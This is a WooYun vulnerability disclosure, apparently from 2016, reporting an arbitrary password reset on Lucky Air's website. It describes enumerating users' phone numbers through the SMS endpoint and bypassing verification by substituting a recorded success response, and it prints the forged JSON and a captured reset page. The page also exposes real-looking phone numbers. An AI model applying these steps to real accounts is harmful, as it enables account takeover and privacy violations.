祥鹏航空某系统任意用户密码重置 | wooyun-2016-0188000| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0188000

漏洞标题：祥鹏航空某系统任意用户密码重置

漏洞作者：黑骑士

提交时间：2016-03-23 09:57

修复时间：2016-05-08 10:12

公开时间：2016-05-08 10:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-23：细节已通知厂商并且等待厂商处理中
2016-03-24：厂商已经确认，细节仅向厂商公开
2016-04-03：细节向核心白帽子及相关领域专家公开
2016-04-13：细节向普通白帽子公开
2016-04-23：细节向实习白帽子公开
2016-05-08：细节向公众公开

简要描述：

祥鹏航空某系统任意用户密码重置

详细说明：

http://www.luckyair.net/
祥鹏航空官方主站用户密码可以在忘记密码页面任意重置
绕过思路：
系统首先获取绑定手机的验证码，进行验证，正确即返回输入新密码页面，错误即返回报错页面，同时将账号信息记入cookie。输入新密码后直接把新密码和cookie返回系统，不再做验证。因此只需先记录正确跳转至新密码页面的返回包，在输入验证码后用其替代报错页面返回包即可绕过验证。
另外通过发送手机验证码的位置可以轻易爆破出用户手机号，用户账号安全面临严重威胁

漏洞证明：

http://www.luckyair.net/
祥鹏航空主页点击用户登录

点击忘记密码

这里可以爆破一下用户手机号，点击发送口令抓返回包即可。航空公司的用户量非常大，跑了一小会就出来一堆用户手机号

选个测试账号13802035266，点获取口令。随便填入全零。

点击下一步抓返回包，看到报错信息

将包中内容替换为

{"email":null,"errorMessage":"OK","j_captcha_response":"9F5E","mobileNo":"13802404669"}

后面还有一个数据包

提交后抓返回包，看到是报错页面

将报错页面替换成之前记录的输入新密码页面提交（代码太长，放在最后）

成功跳转至输入新密码页面

输入新密码TEST000000，提交成功

登陆看看

输入密码页面的数据包

HTTP/1.1 200 OK
Server: nginx/1.7.11
Date: Wed, 23 Mar 2016 00:53:42 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Content-Length: 20714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
	<head id="">
		<meta http-equiv="X-UA-Compatible" content="IE=8"/>
		<meta name="keywords" content="ç¥¥é¹èªç©º[å®æ¹ç½ç«] æºç¥¨ç§æ|èªçæ¥è¯¢|åçä¹æº|éåºé¢è®¢|åå..." />
		<meta name="description" content="äºåç¥¥é¹èªç©ºæéè´£ä»»å¬å¸ï¼ç®ç§°ï¼ç¥¥é¹èªç©ºï¼æ¯ä¸å½ç¬¬åå¤§èªç©ºéå¢ââæµ·èªéå¢çèªç©ºæåä¼ä¸ãå¨'2010ä¸å½ä¼ä¸500å¼º'ä¸ï¼æµ·èªéå¢æåç¬¬179ä½ãæµ·èªéå¢æä¸æºéæ»è§æ¨¡290æ¶ï¼å¶å¨äºåçè¿åä»½é¢åå±äºåå¸åºç¬¬äºã" />
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<meta name="keywords" content="ç¥¥é¹ ç¥¥é¹èªç©º äºåèªç©º ç®åçæ´» å¿«ä¹é£è¡ äºåç¥¥é¹èªç©ºæéè´£ä»»å¬å¸ èªç©ºææ¸¸ æµ·èªäºå" />
		<title>ç¥¥é¹èªç©º[å®æ¹ç½ç«] èªçæ¥è¯¢|æºç¥¨ç§æ|éåºé¢è®¢|ç§è½¦|åå...</title>
		<link href="http://www.luckyair.net/favicon.ico" rel="shortcut icon" />
		<script src="/themes/luckyair2016/js/jquery-1.7.2.min.js"></script>
		<!-- ä¸ºäºç»ä¸äºé¡µé¢åªåµå¥å¤´å°¾ éè¦å¼å¥å°±å¾cssæä»¶åjsæä»¶-->
		<link rel="stylesheet" href="/themes/luckyair2014/css/basic.css" />
		<link rel="stylesheet" href="/themes/luckyair2014/css/index.css" />
		<link href="/themes/luckyair2016/css/basic.css" rel="stylesheet" type="text/css" />
		<link href="/themes/luckyair2016/css/index.css" rel="stylesheet" type="text/css" />
		<script type="text/javascript" >
			function getpath(){
			//æ ¹ç®å½
			var path = "";
			return path;
			}
		</script>
		<!-- æ¥ææ§ä»¶ -->
		<script src="/js2014/jquery.json-2.3.min.js" type="text/javascript"></script>
		<script src="/themes/luckyair2014/js/ui.js" type="text/javascript"></script>
		
		<!-- æ¥ææ§ä»¶ -->
		<script src="/js2014/jqueryui/i18n/jquery.ui.datepicker-zh-CN.js" type="text/javascript"></script>
		<script src="/js2014/jqueryui/ui/jquery.ui.core.js" type="text/javascript"></script>
		<script src="/js2014/jqueryui/ui/jquery.ui.widget.js" type="text/javascript"></script>
		<script src="/js2014/jqueryui/ui/jquery.ui.datepicker.js" type="text/javascript"></script>
		<!-- åå¸ä¸åç  -->
		<script type="text/javascript" src="/js2014/jqueryui/ui/jquery.ui.position.js" ></script>
		<script type="text/javascript" src="/js2014/jqueryui/ui/jquery.ui.menu.js" ></script>
		<script type="text/javascript" src="/js2014/jqueryui/mfui/jquery.ui.cityautocomplete.js" ></script>
		<script src="/js2014/aircity/airport_8L.js" type="text/javascript"></script>
		<link rel="stylesheet" href="/js2014/jqueryui/themes/base/jquery.ui.all.css"></link>
		<link rel="stylesheet" href="/js2014/jqueryui/themes/smoothness/jquery-ui-1.9.2.custom.css"></link>
		
		<!-- å¼¹æ¡ -->
 		<script src="/themes/luckyair2016/js/alert-dialog/dialog-min.js" type="text/javascript"></script>
 		<script src="/themes/luckyair2016/js/alert-dialog/menu.js" type="text/javascript"></script>
 		<link href="/themes/luckyair2016/css/alert-dialog/ui-dialog.css" rel="stylesheet"></link>
 		<!-- ç»å½ -->
 		<script src="/themes/luckyair2016/js/textUtils.js"></script>
 		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type="text/css">
	.errorMsg{
		color: red;
		font-size: 12px;
	}
	.gray{color: #999;font-size: 12px;}
</style>
	</head>
<body>
<!-- è¯¥é¡µé¢æ¯ç»åªåµå¥å¤´å°¾çé¡µé¢æç -->
<div class="">
	
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
		
		
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- ç»å½é¡µ -->
<input type="hidden" id="loginUser" value="null"/>
<script src="/themes/luckyair2016/js/login.js"></script>
<!-- é®ç½©å± -->
		<div class="alert_c" style="display:none;" id="alert_div"></div>
		<!-- end é®ç½©å± -->
		<!-- å¼¹åºå± -->
		<div class="popLogin hide" id="alert_login" style=";">
			<div class="pop_hd cf">
				<ul class="popTab" id="loginTab">
					<li><a class="hover" href="javascript:void(0)">ä¼åç»å½</a></li>
					<li><a href="javascript:void(0)">åæ³¨åç»å½</a></li>
					<li style="width:132px;margin-right:0px;"><a href="javascript:void(0)">å¤§å®¢æ·ç»å½</a></li>
				</ul>
			</div>
			<div class="pop_bg">
			 <!-- æ®éä¼åç»å½start -->
			 <form action="/Login.action" method="post" id="commonLogin">
				<table width="100%" class="tb_style03" >
					<tr>
						<th style="width:60px;">ç¨æ·å</th>
						<td><input style="width:240px;" class="input_gray_peo" type="text" name="userName" id="userName" placeholder="é®ç®±/ææºå·/ç¨æ·å"><i class="ico" id="userNameImg"></i></td>
					</tr>
					<tr>
						<th>å¯ ç </th>
						<td><input style="width:240px; margin-right:8px;" class="input_gray_pass02" type="password" name="password" id="password" placeholder="å¯ç " id="pwdImg"><i class="ico"></i></td>
					</tr>
					<tr>
						<th>éªè¯ç </th>
						<td><input style="width:150px; margin-right:8px;" class="input_gray_pic" type="text" name="j_captcha_response" id="j_captcha_response" placeholder="éªè¯ç "><img src="/jcaptcha?.tmp=0.06781555591097987" title="ç¹å»æ´æ¢éªè¯ç " name="capthcaChange" id="capthcaChange1" style="cursor: pointer;"/><i class="ico"></i></td>
					</tr>
					<tr>
						<td colspan="2" align="center"><span class="c_red f_12" id="errmsg01">&nbsp;</span></td>
					</tr>
				</table>
			 </form>
				<!-- åæ³¨åç¨æ·  -->
			 <form action="/nonRegLogin1Ajax.action" method="post" id="phoneLogin">
				<table width="100%" class="tb_style03 hide" >
					<tr>
						<th style="width:60px;">ææºå·</th>
						<td>
						<input style="width:240px;" class="input_gray_peo" type="text" name="mobile1" id="mobile1" placeholder="è´ç¥¨æ¶è¾å¥çææºå·">
						<input type="hidden" name="mobile" value="" id="mobile">
						<i class="ico"></i>
						</td>
					</tr>
					<tr>
						<th>éªè¯ç </th>
						<td><input style="width:128px; margin-right:8px;" class="input_gray_pic" type="text" name="jCaptchaResponseNoreg" id="jCaptchaResponseNoreg" placeholder="éªè¯ç "><img src="/jcaptcha?.tmp=0.06781555591097987" name="capthcaChange" id="capthcaChange2" title="ç¹å»æ´æ¢éªè¯ç " style="cursor: pointer;"/><i class="ico"></i></td>
					</tr>
					<tr>
						<th>å£ä»¤</th>
						<td><input style="width:128px; margin-right:8px;" class="input_gray_pass02" type="text" name="pass" id="pass" placeholder="ææºå£ä»¤"><a title="ç¹å»åéå£ä»¤" href="javascript:void(0);" id="sendSms" style="color: red;text-decoration: none;">åéå£ä»¤</a><i class="ico"></i></td>
					</tr>					
					<tr>
						<td colspan="2" align="center"><span class="c_red f_12" id="errmsg02">&nbsp;</span></td>
					</tr>
				</table>
			 </form>
				<!-- åæ³¨åç¨æ· end -->
				<!-- å¤§å®¢æ·  -->
			 <form action="/kcLoginAjax.action" method="post" id="kcLogin">
				<table width="100%" class="tb_style03 hide">
					<tr>
						<th style="width:60px;">ç¨æ·å</th>
						<td><input style="width:240px;" class="input_gray_peo" type="text" name="kcUserName" id="kcUserName" placeholder="å¤§å®¢æ·ç¨æ·å"><i class="ico"></i></td>
					</tr>
					<tr>
						<th>å¯ç </th>
						<td><input style="width:240px; margin-right:8px;" class="input_gray_pass02" type="password" name="kcPassword" id="kcPassword" placeholder="å¯ç "><i class="ico"></i></td>
					</tr>
					<tr>
						<th>éªè¯ç </th>
						<td><input style="width:150px; margin-right:8px;" class="input_gray_pic" type="text" name="kc_j_captcha_response" id="kc_j_captcha_response" placeholder="éªè¯ç "><img src="/jcaptcha?.tmp=0.06781555591097987" title="ç¹å»æ´æ¢éªè¯ç " name="capthcaChange" id="capthcaChange3" style="cursor: pointer;"/><i class="ico"></i></td>
					</tr>
					<tr>
					<th></th>
					<td><span style="font-family: Microsoft YaHei"><a style="text-decoration: underline;cursor: pointer;width:80px;margin-left: 157px;color: blue;background-color: white;border: 0px;display: inline-block;line-height: 30px;height: 30px;padding-left: 10px;"    onclick="window.open('https://luckyair.easyebank.com/comm_gateway/xp_gkcz.htm?clientType=xphk&serverType=2')" >ç¥¥äºå¡è´å¡</a></span></td>		
				   </tr>
					<tr>
						<td colspan="2" align="center"><span class="c_red f_12" id="errmsg03">&nbsp;</span></td>
					</tr>
				</table>
			 </form>
				<!-- å¤§å®¢æ· end -->
				<div class="m_t_20 m_b_10 tc">
					<p class="m_b_10">
					<span style="width:125px;padding: 5px 28px 5px 28px;"  class="btn_red04"   id="loginsubmit" data-value="commenUser">ç»å½&nbsp;<i id="loading"></i></span>
					<span style="width: 10px;">&nbsp;&nbsp;</span>
					<span style="width:125px;padding: 5px 28px 5px 28px;" class="btn_red04"  id="closeLogin" >å³é</span>
					</p>
					<p><a href="/frontend2014/users/modifyinfo/resetPassword.jsp" style="color: blue;"><u>å¿è®°å¯ç </u></a>  |  <a href="/frontend/users/register/userReg.action?flag=c" style="color: blue;"><u>å¿«éæ³¨å</u></a></p>
				</div>
				<!--  -->
			</div>
		</div>
		
<div id="divifrom" style="display: none;">
<iframe id="iframemess" width="0px;" height="0px;" src="/frontend/users/register/regsentCodePage.action" ></iframe>
</div>
<!-- æ è®°(logo)åºå -->
		<div class="branding">
			<div class="head w_1000a">
				<!-- é¦é¡µ -->
				<div class="home fl">
					<a href="/"><i></i>é¦é¡µ</a>
				</div>
				<!-- end é¦é¡µ -->
				<!-- ç»å½ -->
				<div class="loginaBar fr">
					<div class="login">
						
							<p><a href="javascript:void(0);" id="username" >ä¼åç»å½</a></p>
							<p><a href="/frontend/users/register/userReg.action?flag=c" >é©¬ä¸æ³¨å</a></p>
						
					</div>
					<div class="lang">
						<p><a class="m_r_35" href="#">ä¸æ</a><a href="#">English</a></p>
						<p>(+86)  95071950</p>
					</div>
				</div>
				<!-- end ç»å½ -->
				<!-- ä¸»å¯¼èª -->
				<div class="nav">
					<ul class="nav_list">
						<li><a href="#">é¢è®¢æå¡<i></i></a>
							<div class="navSub hide">
								<ul class="navSub_list">
									<li><a href="/frontend/order/SearchMyOrder.action">æçè®¢å</a></li>
									<li><a href="/extraProduct/frontend/buySeat/buySeatTemp.jsp">éæ©æºä¸åº§ä½</a></li>
									<li><a href="/extraProduct/frontend/meal/inputForMeal.jsp">é¢è®¢æºä¸é¤é£</a></li>
									<li><a href="/extraProduct/frontend/luggage/inputForLuggage.jsp">è´ä¹°é¾éè¡æ</a></li>
									<li><a href="/extraProduct/frontend/vipHall/reserveVIPHall.action">é¢è®¢è´µå®¾å</a></li>
								</ul>
							</div>
						</li>
						<li><a href="#">åºè¡æå¡<i></i></a>
							<div class="navSub hide">
								<ul class="navSub_list">
									<li><a href="/frontend2014/passengerService/flightD.jsp">èªçå¨æ</a></li>
								</ul>
							</div>
						</li>
						<li><a href="#">ç²¾å½©æ´»å¨<i></i></a>
							<div class="navSub hide">
								<ul class="navSub_list">
									<li><a href="/frontend/miaosha/display.action">ç§æ</a></li>
								</ul>
							</div>
						</li>
						<li><a href="#">å¨çº¿æå¡<i></i></a>
							<div class="navSub hide">
								<ul class="navSub_list" style="color: #fff;">
									<li style="text-indent: 7px;">ççº¿çµè¯ï¼95071950</li>
								</ul>
							</div> 
						</li>
					</ul>
				</div>
				<!-- end ä¸»å¯¼èª -->
			</div>
		</div>
		<!-- end æ è®°(logo)åºå -->
<script src="/themes/luckyair2016/js/cut.js"></script>
<script src="/themes/luckyair2016/js/frontend_title.js"></script>
		<!-- end æ è®°(logo)åºå -->
		<!-- logo -->
		<div class="logo02"></div>
		<!-- end logo -->
	<!-- content start-->
		<div class="news-content mb30" style="background: #fff" >
		
		<!-- åè½é¡µé¢ -->
		<script type="text/javascript">
	function checkPwd(){
		var pwd1 = $("#newpwd").val();
		var pwd2 = $("#pwd1").val();
		
		if(pwd1==""){
			$("#errorMessagePwd").removeClass().addClass("errorMsg");
			document.getElementById("errorMessagePwd").innerHTML="è¯·è¾å¥å¯ç ";
			return false;
		}else{
			var tmp = pwd1.replace(/^(\s)*|(\s)*$/g,"");
			var len = tmp.length;
			if(len==0){
				$("#errorMessagePwd").removeClass().addClass("errorMsg");
				document.getElementById("errorMessagePwd").innerHTML="å¯ç ä¸è½å¨é¨ä¸ºç©ºæ ¼ã";
				return false;			
			}else if(len>20||len<6){
				$("#errorMessagePwd").removeClass().addClass("errorMsg");
				document.getElementById("errorMessagePwd").innerHTML="å¯ç é¿åº¦å¿é¡»ä¸º6ï½20ä¸ªåç¬¦ã";
				return false;
		    }else if(isNumStr(pwd1)){
		    	$("#errorMessagePwd").removeClass().addClass("errorMsg");
		    	document.getElementById("errorMessagePwd").innerHTML="å¯ç ä¸è½å¨é¨ä¸ºæ°åã";
		    	return false;
		    }
		}
		document.getElementById("errorMessagePwd").innerHTML="";
		if(pwd2==""){
			document.getElementById("errorMessagePwd1").innerHTML="è¯·åæ¬¡è¾å¥æ°å¯ç ";
			return false;
		}
		
		if(pwd1!=pwd2){
			document.getElementById("errorMessagePwd1").innerHTML="ä¸¤æ¬¡è¾å¥çå¯ç ä¸ä¸è´";
			return false;
		}
		document.getElementById("errorMessagePwd1").innerHTML="";
		resetPwd();
	}
	function resetPwd(){
		var url = '/frontend2014/users/modifyinfo/GetUser!resetPwd.action?newPwd='+$("#newpwd").val();
		$.ajax({
			  type: 'POST',
			  url: url,
			  success: processResetPwd
			});
	}
	function processResetPwd(responseText, textStatus, XMLHttpRequest){
		var msg= responseText.msg;
		$("#resetPwd").hide();
		$("#restPwdRes").show();
		if(msg=='Yes'){
			$("#msg").html("å¯ç éç½®æå!");	
		}else{
			$("#msg").html("å¯ç ä¿®æ¹å¤±è´¥ï¼è¯·èç³»ç®¡çå!");
		}
	}
	
	//æ£æ¥åç¬¦ä¸²æ¯å¦å¨æ¯æ°å
	function isNumStr(val){
		var pattern = /^[0-9]+$/;
		if (pattern.test(val)){
			return true;
		}
		return false;
	}
	
</script>
	
	<!-- content start-->
		<div class="main_content_top clear js_main_content">
			<div id="resetPwd">
			<div class="password_box">
				<ul class="order_flow_menu clear">
					<li>
						<i></i><span>å¡«åææºå·</span>
					</li>
					<li>
						<i></i><span>æ¶å°éªè¯ç ï¼å¹¶åçå®å¨é®é¢</span>
					</li>
					<li class="on">
						<i></i><span>éç½®å¯ç </span>
					</li>
				</ul>
			</div>
			<p class="password_til">ç¬¬ä¸æ¥ï¼éç½®å¯ç </p>
			<form id="regForm" method="post">
			<div class="password_content" id="by_mobile">
				<ul class="member_info_edit" style="padding-left:100px;">
				<li></li>
					<li>
						<label>æ°å¯ç ï¼</label>
						<input type="password" value="" name="newpwd" id="newpwd"/>
						<span class="gray" id="errorMessagePwd">é¿åº¦ä¸º6-20ä¸ªåç¬¦</span>	
					</li>
					<li></li><li></li>
					<li>
						<label>ç¡®è®¤å¯ç ï¼</label>
						<input type="password" name="pwd1" id="pwd1" value="" />
						<span class="errorMsg" id="errorMessagePwd1"></span>
					</li>
				</ul>
			</div>
			</form>
			<p class="member_info_save mt30">
				<a class="icon filghts_btn_search" href="javascript:void(0);" onclick="return checkPwd()">ç¡®è®¤</a>
			</p>
			</div>
			<div id="restPwdRes" style="display: none;font-size: 14px;color: red;" >
				<p align="center" style="margin-top: 20%"><span id="msg"></span></p>
			</div>
		</div>
	<!-- content end-->
<script>(function(){$('.logo02').remove();})();</script>
		<!-- é¦é¡µ -->
		</div>
	<!-- content end-->
	
<!-- åºé¨ä¿¡æ¯ -->
		<div class="footBar m_t_10">
			<div class="foot w_1000a cf p_t_10 p_b_10">
				<div class="news fl">
					<h3 class="tit m_b_15">ææ°æ¶æ¯</h3>
					<ul class="newList" id="news">
						
					</ul>
				</div>
				<!-- end top -->
				<div class="footMenu cf fl">
					<div class="fl" style="width:470px;">
					<dl class="fm_list fl">
						<dt>å¸®å©ä¸å¿</dt>
						<dd><a href="/frontend2016/help/helpTips.jsp?index=1">æå®¢é¡»ç¥</a></dd>
						<dd><a href="/frontend2016/help/helpTips.jsp?index=2">è´ç¥¨æå</a></dd>
						<dd><a href="/frontend2016/help/helpTips.jsp?index=3">ç¥¨å¡å¤ç</a></dd>
						<dd><a href="/frontend2016/help/helpTips.jsp?index=4">æå¡æå</a></dd>
						<dd><a href="/frontend2016/help/helpTips.jsp?index=5">ä¼æ å¸ä¸ç§¯å</a></dd>
					</dl>
					<dl class="fm_list fl">
						<dt>å³äºæä»¬</dt>
						<dd><a href="/frontend2016/help/aboutUs.jsp?index=1">å¬å¸ç®ä»</a></dd>
						<dd><a href="/frontend2016/help/aboutUs.jsp?index=2">åå¬å°å</a></dd>
						<dd><a href="/frontend2016/help/aboutUs.jsp?index=3">èªçº¿ç½ç»</a></dd>
						<dd><a href="/frontend2016/help/aboutUs.jsp?index=4">èªçæ¶å»</a></dd>
					</dl>
					<dl class="fm_list fl">
						<dt>èç³»æä»¬</dt>
						<dd><a href="/frontend2016/help/contactUs.jsp?index=1">å®æ¹æå¡ççº¿</a></dd>
						<dd><a href="/frontend2016/help/contactUs.jsp?index=2">æè¯å»ºè®®</a></dd>
						<dd><a href="/frontend2016/help/contactUs.jsp?index=3">åªä½ä¸çº¿</a></dd>
						<dd><a href="/frontend2016/help/contactUs.jsp?index=4">è¥ä¸æå°</a></dd>
						<dd><a href="/frontend2016/help/contactUs.jsp?index=5">BSPä»£ç</a></dd>
						<dd><a href="/frontend2016/help/contactUs.jsp?index=6">è´§è¿ä¸å¡</a></dd>
					</dl>
					<dl class="fm_list fl">
						<dt>åæé¾æ¥</dt>				
						<dd><a href="http://www.hnair.com" target="_blank">æµ·åèªç©º</a></dd>						
						<dd><a href="http://www.westair.cn" target="_blank">è¥¿é¨èªç©º</a></dd>
						<dd><a href="http://www.tianjin-air.com" target="_blank">å¤©æ´¥èªç©º</a></dd>
						<dd><a href="http://www.capitalairlines.com.cn" target="_blank">é¦é½èªç©º</a></dd>
						<dd><a href="http://www.fuzhou-air.cn" target="_blank">ç¦å·èªç©º</a></dd>
						<dd><a href="http://gt.hnair.com/gt/" target="_blank">ç¥¥é¹å¢éç½</a></dd>
						<dd><a href="http://x.luckyair.net:88/cms/" target="_blank">ç¥¥é¹åéååå°</a></dd>
					</dl>
					</div>
					<div class="fl"  style="width:180px;">
						<div style="margin-top: -17px;margin-left: 84px;">
							<a class="btn_top" href="javascript:void(0)">è¿åé¡¶é¨</a>
						</div>
						<div>
							<div class="appBar fr m_t_45">
								<div class="mob m_b_5">
									<ul class="mob_list">
										<li>
											<a href="#">
												<b><img src="/themes/luckyair2016/images/ico_weixin.png" /></b>
												<p>å®æ¹å¾®ä¿¡</p>
											</a>
										</li>
										<li>
											<a href="#">
												<b><img src="/themes/luckyair2016/images/ico_xina.png" /></b>
												<p>å®æ¹å¾®å</p>
											</a>
										</li>
										<li>
											<a href="#">
												<b><img src="/themes/luckyair2016/images/ico_app.png" /></b>
												<p>ææºAPP</p>
											</a>
										</li>
									</ul>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
			<!-- end åºé¨ä¿¡æ¯ -->
			<!-- ç«ç¹ä¿¡æ¯ -->
			<div class="site_info">
				<div class="w_1000a">
					
					<p><span class="ico m_t_5"><em>&copy;</em>2012-2016 luckyair.net äºåç¥¥é¹èªç©ºæéè´£ä»»å¬å¸ çæææ ææ¯æ¯æï¼æµ·åæå»ºç§æè¡ä»½æéå¬å¸ æ»ICPå¤11002836å·</span> <span class="ico m_t_9 m_l_10">
					<a href='https://ss.knet.cn/verifyseal.dll?sn=e14032853010047599h1h9000000&ct=df&a=1&pa=0.03910850009815292' target='_blank'>
					<img src="/themes/luckyair2016/images/ico_kx.png" alt="å¯ä¿¡ç½ç«"/></a></span>
						<span class="ico m_t_9 m_l_10">
					<a id='___szfw_logo___' href='https://credit.szfw.org/CX20160112013238590188.html' target='_blank'>
					<img src="/themes/luckyair2016/images/footer-cnnic1.png" alt="è¯ä¿¡ç½ç«"/></a></span>
					</p>
				</div>
			</div>
			<!-- end ç«ç¹ä¿¡æ¯ -->
		</div>
<!-- footer start -->
<script src="/themes/luckyair2016/js/frontend_footer.js"></script>
<script type='text/javascript'>
$(document).ready(function(){
	var url = '/index/sitemsg!doAjaxQuery.action';
	loadAnn(url);
	//åå°é¡¶é¨ç¼å¨å¨ç»
	$('.btn_top').on('click', function() {
		$('html,body').animate({
			scrollTop: 0
		}, 300);
		return false;
	}).attr({
		'href': 'javascript:void(0)'
	});
});
</script>
	
</div>
<script src="/js/dcs_tag.js" type="text/javascript"></script>
</body>
</html>

修复方案：

版权声明：转载请注明来源黑骑士@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2016-03-24 10:12

厂商回复：

谢谢，我们会立即安排整改。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0188000

漏洞标题：祥鹏航空某系统任意用户密码重置

相关厂商：祥鹏航空

漏洞作者：黑骑士

提交时间：2016-03-23 09:57

修复时间：2016-05-08 10:12

公开时间：2016-05-08 10:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑骑士@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0188000

漏洞标题：祥鹏航空某系统任意用户密码重置

相关厂商：祥鹏航空

漏洞作者： 黑骑士

提交时间：2016-03-23 09:57

修复时间：2016-05-08 10:12

公开时间：2016-05-08 10:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0188000"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑骑士@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：黑骑士

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源黑骑士@乌云